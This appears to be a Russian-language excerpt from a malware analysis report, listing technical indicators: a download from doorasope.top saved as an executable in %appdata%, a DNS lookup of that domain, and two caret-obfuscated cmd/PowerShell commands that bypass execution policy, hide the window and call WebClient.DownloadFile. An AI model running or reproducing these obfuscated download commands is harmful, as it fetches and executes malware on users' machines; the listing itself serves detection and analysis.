Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ow^Ers^H^ElL.eXE ^-^E^xEC^U^t^IoN^pO^LIcY^ b^Y^p^ASs -n^o^Pr^O^fi^l^E^ ^-^wI^nDOwsTYL^e ^h^i^DD^eN^ (N^e^W-^o^BjE^Ct s^YS^tE^M^.^neT.weB^clienT).DoWnl^o^AdFI^lE('http://www...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^Ow^Ers^H^ElL.eXE ^-^E^xEC^U^t^IoN^pO^LIcY^ b^Y^p^ASs -n^o^Pr^O^fi^l^E^ ^-^wI^nDOwsTYL^e ^h^i^DD^eN^ (N^e^W-^o^BjE^Ct s^YS^tE^M^.^neT.weB^clienT).DoWnl^o^AdFI^lE('http://www...' (со скрытым окном)